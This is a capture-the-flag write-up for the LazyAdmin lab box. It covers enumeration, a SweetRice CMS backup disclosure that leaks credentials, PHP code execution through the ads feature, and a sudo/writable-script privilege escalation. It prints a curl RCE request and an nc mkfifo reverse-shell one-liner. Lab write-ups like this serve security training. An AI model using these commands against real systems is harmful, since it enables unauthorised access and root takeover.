Summary

LazyAdmin is a Linux box. Initial Scan was finding an Sweet-Rice CMS which have a backup Disclosure issue using that we can dump the credentials in Database.Login with those credentials we see we can put php code in an ads using which we can get RCE. After getting RCE we can get a shell. Trying sudo -l shows us that we can run a backup.pl script as root without password and checking backup.pl reveal a bash script is being called which can be modified by www-data using which we can get a root shell.

Enumeration

nmap

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 19:22 IST
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 50.00% done; ETC: 19:22 (0:00:21 remaining)
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 50.53% done; ETC: 19:22 (0:00:21 remaining)
Nmap scan report for 10.10.104.214
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.67 seconds

Web

gobuster - root

gobuster dir  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.104.214/ -x php -o root.gobust

/content

Content

gobuster - content

/index.php (Status: 200)
/images (Status: 301)
/js (Status: 301)
/inc (Status: 301)
/as (Status: 301)
/_themes (Status: 301)
/attachment (Status: 301)

Content - AS

Searchsploit shows us that there is a Backup Disclosure from

http://localhost/inc/mysql_backup

Backup Disclosure

http://10.10.104.214/content/inc/mysql_backup/

reveal the mysql backup

checking the sql dump we find a username as manager and password hash as 42f749**********************afcb which reveal the password as P*********3

Again cheking Searchsploit we find a RCE method by creating an ad and accessing it from

RCE

Creating an ads allow us to place php code so we can use that to get Code Execution

curl http://10.10.104.214/content/inc/ads/test.php?cmd=whoami

www-data

Shell

using the RCE we can get a shell using php-reverse-shell.php from pentestmonkey

checking /home/itguy/ we see we can read user.txt as THM{63

Privilege Escalation

sudo -l reveal that we can run

www-data@THM-Chal:/home/itguy$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

and checking the script we see that it is running system(‘sh’,’/etc/copy.sh’) and checking the permission of /etc/copy.sh we see we can modify that

we can place

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

and execute

sudo /usr/bin/perl /home/itguy/backup.pl

which give us a shell as root

root@THM-Chal:~# whoami;hostname;cut -c 1-10 root.txt
whoami;hostname;cut -c 1-10 root.txt
root
THM-Chal
THM{6637f4
root@THM-Chal:~#

and we have pwned LazyAdmin